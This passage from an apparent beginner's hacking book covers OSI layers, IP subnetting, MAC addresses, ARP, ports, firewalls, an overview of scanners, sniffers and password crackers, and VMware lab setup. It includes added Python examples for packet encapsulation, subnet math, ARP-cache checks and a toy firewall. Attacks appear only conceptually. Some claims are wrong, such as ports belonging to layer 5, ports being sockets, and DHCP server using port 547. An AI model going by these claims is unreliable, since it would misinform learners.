ports, which we will cover later in this chapter. 


To begin, understand that the OSI model consists of seven different 
layers as follows: 


7. Application — A computer application that creates data such as an 
email or instant messaging program 

6. Presentation — The method of encoding data, such as ASCII text 

5. Session — TCP ports (FTP, POP, HTTP, HTTPS, etc.) 

4. Transport — TCP or UDP connections (among others) 

3. Network — IP addresses and packets 

2. Data-Link — MAC addresses and frames 

1. Physical — ones and zeros (bits) transmitted across a cable 


(*Note: If you don’t understand some of the terminology described 
above, take a deep breath and relax. We’ll get to that later.*) 


I realize that this list may look odd because it starts with the number 
7, but the first layer of the model is always represented on the bottom 
since each additional layer is dependent on its subordinate layer to 
encapsulate and transmit data. You can remember the first letter of 
each layer with the mnemonic ‘Please Do Not Throw Sausage Pizza 
Away’. We won’t go into great detail about the finer points of this 
model as we will mainly be concerned with layers 2, 3, 4, and 5 
from a hacking perspective, but you need a high level understanding 
of the OSI model regardless. 


Each layer has its own specific function to facilitate data transmissions 
between two remote systems. As data (like the text in an instant 
messaging application) is generated on one device, it starts at the top 
of the OSI model in the application layer and gets pushed down 
through each subordinate layer until it becomes 0’s and 1’s on a cable 
at the physical layer. Each layer encapsulates data for transmission 
before sending it on to the next layer for further encapsulation. The 
process works much like Russian nesting dolls. Once the data has 
reached the physical layer, it gets transmitted as binary bits over a 
cable medium. Then, the receiving host unpacks the encapsulated data 
from each layer using the reverse process. 


This model is fundamental to understanding data transmission, but 
how will this help you build a skillset for hacking? First of all, it is 
essential to understand this model if you hope to learn about different 
network protocols and TCP/IP ports. Also, terminology is often 
thrown around regarding a device’s or protocol’s function and what 
layer of the OSI model it belongs to. For example, MAC addresses are 
a layer 2 address while IP addresses are a layer 3 address. And ports — 
which I am sure you have heard of before — belong to layer 5. We will 
dig into all of these concepts shortly, but first you need to know about 
IP addresses so you can identify various hosts when you are hacking! 
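To make the nesting-doll picture concrete, here is an added Python example (not code from the book) that builds a layer 4 UDP segment, wraps it in a layer 3 IPv4 packet, wraps that in a layer 2 Ethernet frame, and then peels the headers off again in reverse order on the receiving side. The MAC addresses, IP addresses, ports and payload are constructed sample values.

```python
import struct

ETHERTYPE_IPV4 = 0x0800   # layer 2 header field saying "an IPv4 packet is inside"
PROTO_UDP = 17            # layer 3 header field saying "a UDP segment is inside"


def mac_to_bytes(mac: str) -> bytes:
    """'b8:ee:65:25:7e:a6' -> 6 raw bytes (a layer 2 address)."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_to_bytes(ip: str) -> bytes:
    """'192.168.1.1' -> 4 raw bytes (a layer 3 address, one byte per octet)."""
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum over the 16-bit words of the IPv4 header (RFC 791)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold the carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_udp(src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Layer 4: an 8-byte UDP header in front of the application data.
    The UDP checksum is left at 0, which IPv4 permits (it means 'not computed')."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def build_ipv4(src_ip: str, dst_ip: str, segment: bytes) -> bytes:
    """Layer 3: a 20-byte IPv4 header wrapped around the layer 4 segment."""
    # version/IHL, TOS, total length, ID, DF flag, TTL, protocol, checksum (0 for now), src, dst
    fields = (0x45, 0, 20 + len(segment), 0x1234, 0x4000, 64, PROTO_UDP, 0,
              ip_to_bytes(src_ip), ip_to_bytes(dst_ip))
    header = struct.pack("!BBHHHBBH4s4s", *fields)
    checksum = ipv4_checksum(header)        # computed with the checksum field zeroed
    return header[:10] + struct.pack("!H", checksum) + header[12:] + segment


def build_ethernet(src_mac: str, dst_mac: str, packet: bytes) -> bytes:
    """Layer 2: a 14-byte Ethernet header wrapped around the layer 3 packet."""
    return struct.pack("!6s6sH", mac_to_bytes(dst_mac), mac_to_bytes(src_mac), ETHERTYPE_IPV4) + packet


def encapsulate(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, payload: bytes) -> bytes:
    """Sending side: push the data down the stack, L4 -> L3 -> L2, each layer wrapping the one above."""
    return build_ethernet(src_mac, dst_mac,
                          build_ipv4(src_ip, dst_ip, build_udp(src_port, dst_port, payload)))


def decapsulate(frame: bytes) -> dict:
    """Receiving side: peel the headers off in reverse order, checking each layer before trusting the next."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("frame does not carry IPv4")
    packet = frame[14:]
    ihl = (packet[0] & 0x0F) * 4            # header length in bytes (20 when there are no options)
    if ipv4_checksum(packet[:ihl]) != 0:    # a valid header sums to zero once its checksum is included
        raise ValueError("corrupt IPv4 header")
    _, _, total_len, _, _, _, proto, _, src_ip, dst_ip = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if proto != PROTO_UDP:
        raise ValueError("packet does not carry UDP")
    segment = packet[ihl:total_len]
    src_port, dst_port, udp_len, _ = struct.unpack("!HHHH", segment[:8])
    return {
        "src_mac": bytes_to_mac(src_mac), "dst_mac": bytes_to_mac(dst_mac),
        "src_ip": bytes_to_ip(src_ip), "dst_ip": bytes_to_ip(dst_ip),
        "src_port": src_port, "dst_port": dst_port,
        "payload": segment[8:udp_len],
    }


# Constructed sample: a small datagram from one LAN host to another (all values made up).
SAMPLE_FRAME = encapsulate("b8:ee:65:25:7e:a6", "00:1a:2b:3c:4d:5e",
                           "192.168.1.1", "192.168.1.2", 50000, 53, b"hello")

if __name__ == "__main__":
    print(len(SAMPLE_FRAME), "bytes on the wire:", SAMPLE_FRAME.hex())
    print(decapsulate(SAMPLE_FRAME))
```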


IP Addressing Essentials 


Of the fundamental concepts we are discussing in this book, IP 
addressing is by far the most important. But what is an IP address? 
Well, an IP address is a number that serves as a unique identifier that 
helps computers differentiate between hosts connected to their 
network. The most common analogy to describe this concept is that of 
the post system. If you wanted to mail a letter to someone (send them 
data), you would first need to know their home’s address (IP address) 
before your message could be delivered. 


Whether you know it or not, you have undoubtedly seen IP addresses 
already. They consist of four numbers ranging from 0-255 that are 
separated by periods as in the following example: 


- 192.168.1.1 


Also understand that an IP address is 32 bits long. We won’t dig into 
binary math because it won’t do much for our network penetration 
examples later in this book, but know that each number separated by 
a period in the address is called an octet. It is called this because each 
of the four numbers are 8 bits (1 byte) in length. However, this IP 
address lacks something called a subnet mask, so we don’t know 
what network it belongs to. 


Subnet Masks 


Each IP address is composed of two portions: the network portion of 
the address and the host portion. A subnet mask determines how 
much of the IP address defines a network and how much of the 
address identifies a host on that network subnet. For the remainder of 
this book, just note I will use the terms LAN (Local Area Network) and 
subnet interchangeably. Consider the following four examples of 
subnet masks: 


1. 255.0.0.0 (/8) — 8 bits (the first octet) define the network portion of 
the address. 

2. 255.255.0.0 (/16) — 16 bits (the first two octets) define the 
network portion of the address. 

3. 255.255.255.0 (/24) — 24 bits (the first three octets) define the 
network portion of the address. 

4. 255.255.255.255 (/32) — This subnet mask indicates a host 
address. It does not indicate a network subnet. 


Note that subnet masks can be written using two different notations. 
Consider the first example. 255.0.0.0 is just another way of writing 
“/8” because they both indicate that the first octet in the IP address 
(the first byte or the first 8 bits) describes the network portion of the 
address. 


Did you notice how these four subnet masks are in multiples of 8? 
That was intentional because it makes our example much easier. The 
truth is that there are many more complex subnet masks such as /17, 
/21, or /30 that lie outside the scope of this book because they require 
binary math. However, on private home networks such as the 
environment where you will be testing our demos, a /24 subnet mask 
is by far the most common. I’d even bet big money that your home 
network device uses a /24 subnet mask. That is, unless you changed it, 
in which case you would already know about IP subnets! 


So, now it’s time to put two and two together. We are going to 
consider an IP address and a subnet mask together, determine the host 
and network portion of the address, and then determine the complete 
range of usable IP addresses for that subnet. Consider the following: 


- IP Address: 192.168.1.1 
- Subnet Mask: 255.255.255.0 


All right, so let’s chop up the IP address and define the network 
portion of the address. Can you work it out? When the subnet mask is 
applied to the IP address, we see that the first 3 octets determine the 
network subnet. So, 192.168.1.0 /24 is the network on which the host 
with the IP address 192.168.1.1 resides. That means that the last octet 
determines the host portion of the address. On the 192.168.1.0 /24 
network subnet, this host has the address of “1.” Furthermore, we can 
conclude that because each octet can range from 0 — 255 that other 
hosts on the 192.168.1.0/24 subnet can use addresses from 2-254 
(you never use the 0 or 255th address). Usable addresses on this 
subnet include 192.168.1.2 — 192.168.1.254. Understand that if the 
192.168.1.1 host was sending data to the host using the 192.168.1.2 
address, they are communicating over their LAN since they belong to 
the same network. 


Two Special Network Addresses 


So why don’t we use the 0 or the 255th addresses on a subnet as host 
addresses? Because these two addresses are special. The first one is 
called the network address. This address can’t be assigned to a host 
because it defines an entire network. In our example above, this 
address was 192.168.1.0. Also, note that the last address on a network 
subnet is the broadcast address. This address is used to send 
information to every host residing on that network at the same time, 
so this address can’t be used for a single host address either. In our 
previous example, the broadcast address is 192.168.1.255. 
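The worked example above (192.168.1.1 with 255.255.255.0) carried out in code, as an added Python example that is not from the book: it splits an address into its network and host portions, derives the network and broadcast addresses and the usable range, and checks whether two hosts share a LAN. It goes a little beyond the text by accepting masks such as /21 that do not fall on an octet boundary, because the same bitwise AND works for every prefix length.

```python
def ip_to_int(ip: str) -> int:
    """'192.168.1.1' -> 32-bit integer, so the mask can be applied with a bitwise AND."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {ip}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def int_to_ip(n: int) -> str:
    """Inverse of ip_to_int: 3232235777 -> '192.168.1.1'."""
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def prefix_to_mask(prefix: int) -> int:
    """/24 -> 0xFFFFFF00: the top `prefix` bits are 1 (network), the rest 0 (host)."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def mask_to_prefix(mask: str) -> int:
    """'255.255.255.0' -> 24. Rejects masks whose 1 bits are not contiguous (e.g. 255.0.255.0)."""
    m = ip_to_int(mask)
    prefix = bin(m).count("1")
    if m != prefix_to_mask(prefix):
        raise ValueError(f"not a valid subnet mask: {mask}")
    return prefix


def subnet_info(ip: str, mask: str) -> dict:
    """Work out the network and host portions of `ip` under `mask` ('255.255.255.0' or '/24')."""
    prefix = int(mask[1:]) if mask.startswith("/") else mask_to_prefix(mask)
    m = prefix_to_mask(prefix)
    addr = ip_to_int(ip)
    network = addr & m                          # keep only the bits the mask covers
    broadcast = network | (~m & 0xFFFFFFFF)     # network bits plus every host bit set to 1
    info = {
        "prefix": prefix,
        "mask": int_to_ip(m),
        "network": int_to_ip(network),
        "host_part": addr & ~m & 0xFFFFFFFF,    # the host's number within the subnet
        "broadcast": int_to_ip(broadcast),
    }
    if prefix <= 30:
        # Everything strictly between the network and broadcast addresses can be a host.
        info["first_usable"] = int_to_ip(network + 1)
        info["last_usable"] = int_to_ip(broadcast - 1)
        info["usable_count"] = broadcast - network - 1
    else:
        # /32 names a single host and /31 a point-to-point pair (RFC 3021): no addresses are reserved.
        info["first_usable"] = int_to_ip(network)
        info["last_usable"] = int_to_ip(broadcast)
        info["usable_count"] = broadcast - network + 1
    return info


def same_lan(ip_a: str, ip_b: str, mask: str) -> bool:
    """True when both addresses share the same network portion, i.e. they talk directly over the LAN."""
    return subnet_info(ip_a, mask)["network"] == subnet_info(ip_b, mask)["network"]


if __name__ == "__main__":
    for ip, mask in [("192.168.1.1", "255.255.255.0"), ("10.37.200.77", "/21"), ("192.168.1.5", "/32")]:
        print(ip, mask, subnet_info(ip, mask))
    print(same_lan("192.168.1.1", "192.168.1.2", "/24"), same_lan("192.168.1.1", "192.168.2.1", "/24"))
```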


MAC Addresses 


MAC (Media Access Control) addresses are layer 2 addresses, and they 
are globally unique. Each MAC address is contained on the network 
card of your computer, and it is composed of twelve hexadecimal 
digits (0-9, A, B, C, D, E, F) which total 48 bits in length. The 
following is an example of a MAC address: 


- B8EE:6525:7EA6 


The first half of the address — the first 6 digits — indicate the OUI 
(Organizationally Unique Identifier). This is just a fancy way of saying 
that it marks who manufactured the network card hardware in your 
computer. The last 6 digits are a unique identifier for that 
manufacturer’s network cards. 


Because MAC addresses are layer 2 addresses, they cannot be routed 
on the Internet. They belong in the data-link layer of the OSI model, 
and they can only help devices speak to one another on the same LAN 
via a layer 2 network switch. In order for layer 2 addresses and layer 
3 addresses to operate together, we need a mechanism that binds 
them together. 


ARP (Address Resolution Protocol) 


ARP is a network protocol that binds layer 2 addresses to layer 3 
addresses. Both networking devices and computers alike keep tables 
that record ARP information on the LAN so they can keep track of 
which MAC addresses are paired with which IP addresses. This 
information is constantly changing every time you take your laptop or 
mobile device to a new wireless network, and this information is 
critical to facilitating types of attacks such as a man in the middle 
attack. 


Basically, when a host wants to send data to another computer, it has 
some decisions to make regarding how it will send the data. Here’s 
how it works. The host first looks at its own IP address and subnet 
mask to determine if the destination host resides on the same subnet. If not, 
the host sends that information to its default gateway to be routed to 
the appropriate network. The host will look at its ARP table, find the 
matching entry for the default gateway, and address its data to the 
default gateway’s MAC address. However, if the destination host is on 
the same subnet, all it needs to do is find the matching MAC address 
for the destination IP and send it directly to the intended party. 


If you use a Windows computer, you can use the arp -a command 
from the command prompt to view the contents of your ARP cache. 
ARP is an integral part of modern networks, and there are many 
advanced exploits that revolve around manipulating this protocol, so 
you need to have a basic understanding of it. 
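The next-hop decision just described, as an added Python example (not the book's code): it parses the text of a Windows `arp -a` listing (a constructed sample with made-up addresses), decides whether a destination is on the local subnet, and looks up the MAC address the frame should be addressed to. It also flags the case a defender cares about, two unicast IP addresses mapped to the same MAC, since that is what a poisoned ARP cache looks like.

```python
import re

# Constructed sample of what `arp -a` prints on a Windows host (all addresses are made up).
SAMPLE_ARP_A = """\
Interface: 192.168.1.20 --- 0x5
  Internet Address      Physical Address      Type
  192.168.1.1           b8-ee-65-25-7e-a6     dynamic
  192.168.1.30          00-1a-2b-3c-4d-5e     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.251           01-00-5e-00-00-fb     static
"""

# One cache entry: IPv4 address, MAC written as six hex pairs joined by '-', entry type.
ARP_ENTRY = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)", re.I)

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def parse_arp_table(text: str) -> dict:
    """Return {ip: mac} for every entry line; the interface banner and column headers are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def ip_to_int(ip: str) -> int:
    return int.from_bytes(bytes(int(o) for o in ip.split(".")), "big")


def on_same_subnet(ip_a: str, ip_b: str, prefix: int) -> bool:
    """Compare the network portions of two addresses under a /prefix mask."""
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return ip_to_int(ip_a) & mask == ip_to_int(ip_b) & mask


def next_hop(my_ip: str, prefix: int, gateway_ip: str, dst_ip: str, arp_table: dict) -> tuple:
    """Decide which IP the frame must be addressed to and look up its MAC.

    Local destination -> resolve the destination itself; remote -> resolve the default gateway.
    A MAC of None means the cache has no entry, so a real host would broadcast an ARP request first."""
    target = dst_ip if on_same_subnet(my_ip, dst_ip, prefix) else gateway_ip
    return target, arp_table.get(target)


def duplicate_macs(arp_table: dict) -> dict:
    """Unicast IPs that share one MAC: {mac: [ip, ...]}. An empty result is what a healthy LAN looks like;
    the gateway's IP suddenly sharing a MAC with another host is the classic sign of a poisoned cache."""
    by_mac = {}
    for ip, mac in arp_table.items():
        # Broadcast and multicast entries are expected to repeat, so they are not evidence of anything.
        if mac == BROADCAST_MAC or int(ip.split(".")[0]) >= 224:
            continue
        by_mac.setdefault(mac, []).append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_A)
    print(next_hop("192.168.1.20", 24, "192.168.1.1", "192.168.1.30", table))   # same LAN: frame goes straight to the host
    print(next_hop("192.168.1.20", 24, "192.168.1.1", "203.0.113.9", table))    # off-LAN: frame goes to the gateway's MAC
    print(duplicate_macs(table))
```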


Ports and Firewalls 


Ports, which are also sometimes called sockets, were one of the hardest 
fundamental concepts for me to wrap my head around when I first 
started learning network engineering and computer hacking years 
ago. Basically, they are numeric values that are part of the TCP/IP 
protocol suite that are used to tag different types of traffic. By tagging 
traffic, devices like firewalls can take different actions when different 
data streams flow through a network. 


There are literally thousands of different ports that are each used for 
different types of traffic and applications, but only a few of these are 
well-known protocols. Some software developers reserve certain ports 
for their custom application traffic, but you only need to be concerned 
with the well-known ports to get your feet wet with hacking. It is 
crucial that you have a basic understanding of ports because later we 
will go through the process of port scanning on your local network to 
ascertain which of these ports are open and which are closed. 


The following are some of the most common ports and their respective 
protocols and traffic types: 


- Port 80: HTTP (Hyper Text Transfer Protocol — used for web browsing 
and web pages) 

- Port 20/21: FTP (File Transfer Protocol — used to download files 
remotely) 

- Port 443: HTTPS (Hyper Text Transfer Protocol Secure — encrypted 
HTTP) 

- Port 22: SSH (Secure SHell — used to remotely run command line 
procedures) 

- Port 53: DNS (Domain Name System — used to bind IP addresses to 
URLs) 

- Port 547: DHCP Server (Dynamic Host Configuration Protocol — 
automatic IP address assignment) 


As you can see, each network protocol is assigned its own unique port 
number. These ports provide a way to handle various types of traffic 
differently. For example, if I didn’t want anyone to download files 
from a personal file server I was hosting on my network, I would 
block connection attempts on port 20 and 21 (FTP). This is an 
extremely basic example, but understand that if you see a host with an 
open port, that host will accept connections using that specific type of 
traffic. As another example, consider a web server that hosts a 
website. It will have either port 80 (HTTP) or port 443 (HTTPS) open, 
and clients can make a connection on those ports with the server to 
download the webpages to their browser. 


These ideas bring us to the next important concept: firewalls. 


The term ‘firewall’ is thrown around in the movies a lot, but most 
people don’t understand what they do. Though they have many 
advanced features, one of a firewall’s most basic functions is to permit 
or deny traffic to a network. Firewalls in home environments act as a 
single point of failure - meaning that all of the data in transit to/from 
the local network needs to first pass through the firewall. Because it 
acts as the only way into a network, the firewall can prevent hackers 
from making connections on specified ports to protect the local 
network. 


This concept refers to a hardware firewall, but there are software 
firewalls as well. For example, just consider the program aptly 
named Windows Firewall. It is a piece of software that will prevent 
the networking card in your computer from making connections on 
any of the ports you choose to block. We will see how to scan a target 
system later with a port scanner to see which ports are open and 
potentially exploitable. 
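A tiny packet filter, added here as an example rather than taken from the book or from Windows Firewall, shows the permit-or-deny-by-port idea in working form: rules are checked top to bottom, the first match wins, and anything unmatched falls to the default policy. The rule sets model the file server from the text (FTP on 20/21 blocked, web on 80/443 allowed); the `shadowed_rules` check is my own addition, showing why rule order matters.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str                 # "allow" or "deny"
    proto: str = "any"          # "tcp", "udp" or "any"
    port: Optional[int] = None  # destination port; None matches every port


def matches(rule: Rule, proto: str, dst_port: int) -> bool:
    return rule.proto in ("any", proto) and rule.port in (None, dst_port)


def evaluate(rules: List[Rule], proto: str, dst_port: int, default: str = "deny") -> Tuple[str, Optional[int]]:
    """First matching rule wins. Returns (action, index of the deciding rule); index is None when the
    default policy applied. Default deny is the safe choice: a port nobody thought about stays closed."""
    for i, rule in enumerate(rules):
        if matches(rule, proto, dst_port):
            return rule.action, i
    return default, None


def shadowed_rules(rules: List[Rule]) -> List[int]:
    """Indices of rules that can never fire because an earlier rule already matches everything they would."""
    shadowed = []
    for i, later in enumerate(rules):
        if any(earlier.proto in ("any", later.proto) and earlier.port in (None, later.port)
               for earlier in rules[:i]):
            shadowed.append(i)
    return shadowed


# The home file server from the text: web traffic in, FTP blocked, nothing else reachable.
SAFE_RULES = [
    Rule("deny", "tcp", 20),
    Rule("deny", "tcp", 21),
    Rule("allow", "tcp", 80),
    Rule("allow", "tcp", 443),
]

# Same intent, but an "allow everything" rule was placed first, so the FTP denies are dead rules.
MISORDERED_RULES = [
    Rule("allow"),
    Rule("deny", "tcp", 20),
    Rule("deny", "tcp", 21),
]

if __name__ == "__main__":
    for port in (21, 80, 443, 22):
        print(f"tcp/{port}: safe={evaluate(SAFE_RULES, 'tcp', port)} "
              f"misordered={evaluate(MISORDERED_RULES, 'tcp', port)}")
    print("shadowed rules in MISORDERED_RULES:", shadowed_rules(MISORDERED_RULES))
```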


You should also know how to run a ping as well as view your IP 
address, subnet mask, and MAC address. These are extremely simple 
commands, and they are used frequently by networking security 
professionals. They are all run from the command prompt, so in 
Windows open up the command prompt by searching for it or hitting 
your Windows key and typing ‘cmd.’ The application’s icon is a black 
box, and once you run this program you see a prompt with a blinking 
underscore. 


To view your IP address, subnet mask, and default gateway, just type 
ipconfig into the command prompt. On the other hand, if you want to 
see your MAC address, just type ipconfig /all into the command 
prompt. If you are using a Mac or Linux computer, the command is 
only slightly different. On these systems the command is ifconfig. 


In Summary 


Please understand that we could go much deeper into these topics. In 
fact, there have been entire books written about some of these 
subjects, but they are too advanced for a beginner and lie outside the 
scope of this book. The idea is to give you a working knowledge of 
these ideas to facilitate your hacking and penetration testing 
endeavors. However, if you want to further your knowledge on these 
concepts, it will only help you become a better hacker. Now that you 
know what IP addresses, MAC addresses, ports, and firewalls are, we 
can move on to more advanced topics. 


Chapter 6 - The Hacker’s Tool Belt 


Hackers have a lot of tools in their tool belt that the average user 
hasn’t even heard of. These tools aren’t incredibly special or secretive, 
but most people simply don’t understand what they are or how to use 
them. The honest truth is that there are boatloads of different tools 
out there that can be used to break into a system or be used to identify 
vulnerabilities. 


Oh, and guess what? Surprisingly enough, many of them are 
completely free to use. Part of the reason many of these tools are free 
to use stems from the fact that many of the tools were written for 
Linux, and the vast majority of Linux software is free of charge 
because it is protected by the GNU license. 


Some of the most popular types of hacking tools that we’ll take a 
hands-on look at in this guide include: 


- Vulnerability scanners — we'll take a look at one called OpenVAS later 
in this book 

- Port scanners — we’ll also see how to use a port scanner called NMAP 

- Packet sniffers — this software listens to and records all of the 
information flowing over your network, and we'll use one later for a 
man-in-the-middle attack demonstration 

- Password crackers — these tools are used to uncover the password to a 
system 


While this certainly isn’t a comprehensive list of the tools a hacker has 
in their tool belt, these are certainly some of the most popular and 
most important tools you need to be aware of. Let’s take a closer look 
at each one of these types of tools in detail. 


Vulnerability Scanners 


Vulnerability scanners were originally designed to help white hat 
hackers find potential security holes in their computing systems to 
plug up the security holes before a black hat hacker could find a way 
to penetrate the system. However, these scanners can be used for both 
good and evil. 


Black hat hackers can easily leverage a vulnerability scanner to find a 
weakness in a network, server, or host to facilitate an attack. And 
these scanners are pretty easy to use, too. Though some of the fine- 
tuning and tweaking of the scan you want to perform can get a little 
complex, by and large all you need to do is point the scanner at a 
target and click a button. But a vulnerability scanner on its own isn’t 
very dangerous. A black hat hacker will then need to use other types 
of software in order to take advantage of the vulnerabilities found 
with the scanner. Vulnerability scanners are really only used to 
identify weaknesses, plain and simple. 


Later in this book we’re going to go through the installation process of 
one such scanner named OpenVAS. We will be installing it in a Linux 
environment, and the installation process is the hardest part. After we 
run through the demo later in the book, all you need to do is supply 
an IP address and click a single button. Once the scanner is up and 
running, it is ridiculously easy to use. 


Pros of Vulnerability Scanners: 

- Help make systems more secure by identifying weaknesses that an 
administrator or security expert can then address and take care of 

- Mitigate the risk of hackers taking advantage of a system 

- They are fun to use! 


Cons of Vulnerability Scanners: 

- Sometimes they are not perfect and have the potential to miss the 
latest system vulnerabilities 

- They rely partially on a database of vulnerabilities that needs to be 
continuously updated 

- Hackers can take advantage of them to find ways to break into a 
system 


Port Scanners 


A port scanner is basically a software utility that can be used to 
determine which ports a host is accepting connections on. For 
example, if I wanted to see if I could pull up a web page from any 
hosts on my network, I would scan my subnet to see if any hosts have 
port 80 open. But this is a basic example. 


The information obtained from a port scanner can help attackers read 
between the lines and determine the purpose of a host on their 
network. For example, if a port scanner showed that a host had port 
9100 open, you could reasonably assume that the host you scanned is 
either a printer or a print server since port 9100 is used for printing. I 
know, I know, printers are boring. But it is amusing to think that you 
could send print jobs to your neighbor’s printer and print anything 
you wanted to after identifying their printer with a port scanner (don’t 
actually do that, it’s just funny to think about). 


But think how far an attacker could take this concept. By identifying 
the services that are running on a host, they can determine what type 
of server they are dealing with, whether or not they have found an 
infrastructure device like a router, switch, or firewall, or find ways to 
attack end user computers by making connections on their active 
ports. 


Now take a moment to consider things from a white hat perspective. 
An ethical hacker could use a port scanner to verify that all of the 
ports on a network that should be closed are actually closed. It is a 
useful verification tool that can be used to prevent vulnerabilities. 


Layer 4 Scanners 


Remember how important I told you the OSI model is? Well there is a 
whole class of scanners that targets layer four (the transport layer) of 
the OSI model specifically. These scanners look for minute details in 
the operation of layer 4 protocols such as TCP (Transmission Control 
Protocol) and UDP (User Datagram Protocol) to find weaknesses in 
hosts. The inner workings of these protocols are actually quite 
complex, but realize that there is a process called a handshake that two 
hosts make before they form a connection. By tricking and 
manipulating the handshake process, attackers can cause serious harm 
to systems in the form of a DoS (Denial of Service) whereby an 
attacker breaks the logic in these protocols to cause a host or service 
to stop functioning or severely underperform. 


Packet Sniffers 


Packet sniffers are invaluable tools that are able to capture, store, and 
display all of the information that is flowing over a cable or 
transmission medium such as a wireless interface. By using a packet 
sniffer, you’ll be able to see in great detail all of the conversations that 
computers are having with each other. 


You can see connection attempts, file transfers, and even Google 
searches. Packet sniffers are especially dangerous when data is being 
sent in plain text, which is another way of saying that the data isn’t 
encrypted before it is sent to another host. So, for example, if your 
username and password weren’t encrypted before being sent to a 
server, an attacker can leverage a packet sniffer to capture that data 
and steal your username and password. 


But some packet sniffers, such as Wireshark, are difficult for newbies 
to read because they simply don’t understand how the various 
protocols operate. A packet sniffer will show an attacker the nitty- 
gritty details of a traffic stream’s raw data. More specifically, it can 
show you the IP address of a host that initiated a connection, how 
another host responded to the connection attempt, any data that was 
sent during the session, and what type of data is flowing over the 
connection via its port number. 


Have you ever wondered how ISPs can see what type of data is 
flowing over their network and determine which hosts are visiting 
specific websites? Packet sniffers are but one tool among many that 
they use to achieve this goal. 


Password Cracking Utilities 


Hackers frequently use tools called password crackers to gain 
unauthorized access to computer systems. Cracking is basically a term 
used to describe the process of obtaining a password that is hidden or 
stored in a protected format. For example, there are wireless password 
cracking tools that allow an attacker to gain the password to a Wi-Fi 
network without needing to know the security key upfront. 


But there are many other types of passwords and methods used by 
these utilities. Some people have heard of a brute force password 
attack before, and these can take a long time to perform. In the brute force 
process, a computer will try to guess every conceivable password to 
gain access to a system by trying every unique combination of 
characters. 


In addition, there are also dictionary based attacks that are useful for 
breaking weak passwords. These types of attacks take a more 
pragmatic approach to cracking a password because they try 
passwords based upon a dictionary of common and popular phrases. 
Typically an attacker will try a dictionary attack before a brute force 
attack because there is a higher chance of cracking a password with a 
dictionary based attack. Brute force attacks have one colossal 
downfall: they can be extremely slow due to the millions and millions 
of combinations they need to try to be successful cracking passwords. 
The process can last for days. Dictionary based attacks, on the other 
hand, are typically much faster because they don’t have nearly as many 
password combinations to attempt. 


Chapter 7 — Utilizing VMWare 


One of the easiest ways for you to build different environments that 
you can learn to hack in is by using VMWare. But what does this 
software actually do? VMWare allows you to run code called ‘virtual 
machines.’ Essentially it has the power to virtualize entire operating 
systems so you don’t have to wipe the operating system off your host 
computer and install a completely new one to get started hacking. 
Sometimes newbies who want to get started hacking may try to install 
an operating system such as Kali Linux in addition to their host 
operating system such as Windows. The only problem is that one 
configuration mistake with the installation could cause a user to lock 
themselves out of their Windows operating system completely. 


Other times they may even accidentally repartition their hard drive 
and wipe out all of their old files. This is a huge headache, but 
installing VMWare will solve these problems and allow you to run 
multiple operating systems simultaneously. The good news is that 
VMWare Player is free to use and easy to install. You can find the 
release notes and download link for VMWare Player on VMWare’s 
website, and you will want to download and install this program for 
some of the demos later in this book. 


It is assumed that you have the ability to install basic software, so we 
won't get into the VMWare installation process. It’s pretty darn 
simple, and all you need to do is follow the installation wizard. Also 
you could be installing this software on different platforms, and the 
installation steps would change. If you need help installing this 
software, you can find help on the VMWare website for your given 
operating system. 


After you have downloaded and installed VMWare, you need to 
download operating system images to run in VMWare. More 
specifically, you should go ahead and download Ubuntu Linux and 
Kali Linux images. You can find Kali Linux images for VMWare and 
Ubuntu images for VMWare for free online. After you have 
downloaded an image, to install it you need run VMWare Player. Then 
click on Player => File => New Virtual Machine and browse to the 
image you downloaded. Alternatively you can just hit ctrl + N after 
you have opened VMware. When you first install a new image in 
VMWare, it will ask you to name it. Personally, I just name the virtual 
machine the same name as the operating system to keep things 
straight. 


Once the image has been successfully downloaded and you install it in 
VMWare, the VMWare application will go through the installation 
procedure exactly as if you were trying to install that operating system 
on your computer, but it will install it within your host environment. 
As you proceed through the installation process, portions of the 
procedure will ask you if you want to install a variety of packages. 
Make sure that you select all of the packages that are described as 
‘security’ or ‘penetration testing’ packages. If you fail to install these 
packages, you will need to go through the installation processes 
individually for the demonstrations that I walk you through later such 
as NMAP. If you have any trouble installing your operating system in 
VMWare, all you need to do is follow the guide on the Kali Linux or 
Ubuntu sites. 


You should also have an idea of the intended uses for each operating 
system. Ubuntu is designed to be an easy to use replacement for other 
desktop operating systems such as Windows. It is well-suited for 
everyday use, and you don’t need to be a Linux expert to use it. As 
such, it is a great environment to expand your Linux skills and it offers 
plenty of different penetration testing tools, scanners, and hacking 
